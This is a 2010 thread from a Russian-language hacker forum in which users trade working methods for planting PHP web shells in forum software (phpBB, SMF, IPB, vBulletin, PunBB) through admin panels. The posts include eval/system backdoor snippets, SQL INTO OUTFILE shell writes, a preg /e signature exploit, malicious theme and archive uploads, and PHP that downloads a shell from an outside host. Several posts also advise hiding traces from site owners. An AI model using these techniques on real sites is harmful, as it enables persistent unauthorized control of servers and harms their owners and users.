RDot

RDot (https://rdot.org/forum/index.php)
-   Форумы (https://rdot.org/forum/forumdisplay.php?f=34)
-   -   Заливка шелла в форумы (https://rdot.org/forum/showthread.php?t=4)

Ded MustD!e 02.07.2010 18:28

Заливка шелла в форумы
 
Собираем в одном месте способы заливки шелла в различные форумы.

Shadow 07.07.2010 01:43

PHPBB3
 
Заливка шела через темплейты в phpBB3(необходим доступ в админку).

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:
Код:

<!-- PHP -->
    system($_REQUEST[c]);
<!-- ENDPHP -->


Pashkela 07.07.2010 15:58

Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Код:

http://site.com/index.php?action=admin
Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

Код:

http://site.com/Themes/wso/wso.php
т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива

Pashkela 07.07.2010 15:58

Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл:
Код:

http://site.com/uploads/shell.php
PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

Код:

http://site.com/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:

Код:

http://site.ru/uploads/av-1.php3
=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master
появится

Код:

C:\WebServers\home\drup614.ru\www\public\style_ima ges\master2
где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

Код:

http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку

Scorpius 11.07.2010 16:00

Заливка шелла в phpBB 2
 
Заливка шелла в phpBB 2.*


1. Создаём файл ex.sql
2. Прописываем туда
Код:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
Где user_id=2 - идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт "Восстановить БД" и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Код:

http://target/profile.php?mode=editprofile&e=phpinfo();

Ded MustD!e 19.07.2010 16:48

Заливка шелла в vBulletin.

В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:
Код:

http://localhost/forum/faq.php?cmd=phpinfo();

it's my 23.07.2010 12:18

Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

ReanimatoR 24.07.2010 12:26

Заливка шелла в IPB 3 (по мне так самая простая, но немного палевная, было лень переписывать нормально, ибо в хуках для ипб не разбираюсь особо=) ).
В общем идете в адмику далее модификации и там кнопка есть добавить модификацию(add hook)
туда вот это добавляешь http://slil.ru/29495625
идешь на главную страницу форума - там будет твой шелл причем с правами от юзера, который заливал файлы по фтп=)
заливаешь дальше куда нужно и отключаешь этот хук, чтобы не спалили

там залит eugen shell
Цитата:

# Eugen's shell

$log_in="dd"; //логин

$password="dd12345"; //пароль

z0mbie 10.08.2010 00:10

Цитата:

Сообщение от Oza (Сообщение 4656)
Способ рабочий.
Но сегодня попался форум где так же переименовывает в *.txt
Что можете посоветовать?
версия v2.1.7

Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода
до отображения или сохранения настройки:" пишем любой php код, например такой:
-----------------------------------------
$linky="http://сайт_с_шеллом/shell.txt";
$saved="/home//www/123/forum/uploads/123.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
echo 'done';
fclose($from);
-----------------------------------------

Этот способ меня всегда выручал)

Ctacok 13.08.2010 08:41

IP.Board 2.3.6
[!] Везде нужны права админа, вы понеле?
Через SQL Запрос:
file_priv
Цитата:

/ipb/admin/index.php?adsess=ваша сессия&section=admin&act=sql&code=runsql&que ry=SELECT+%2527%253C%253FPHP%2Beval%2528%2524_GET% 255Bc%255D%2529%253B%2B%253F%253E%2527+into+outfil e+%2527/var/www/shell.php%2527
('<?PHP eval($_GET[c]); ?>')
(Раскрыть путь можно здесь:
Цитата:

/ipb/admin/index.php?adsess=ваша сессия&section=lookandfeel&act=emoticons&cod e=emo_manage&id=defaasd978_(&!#_(!&ult)
Выполнение кода:
Работает только под Windows. Т.к. нужны права для записи на папку /sources/tasks/
Видео: https://rdot.org/forum/showpost.php?p=4811&postcount=2


Часовой пояс GMT +3, время: 18:25.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot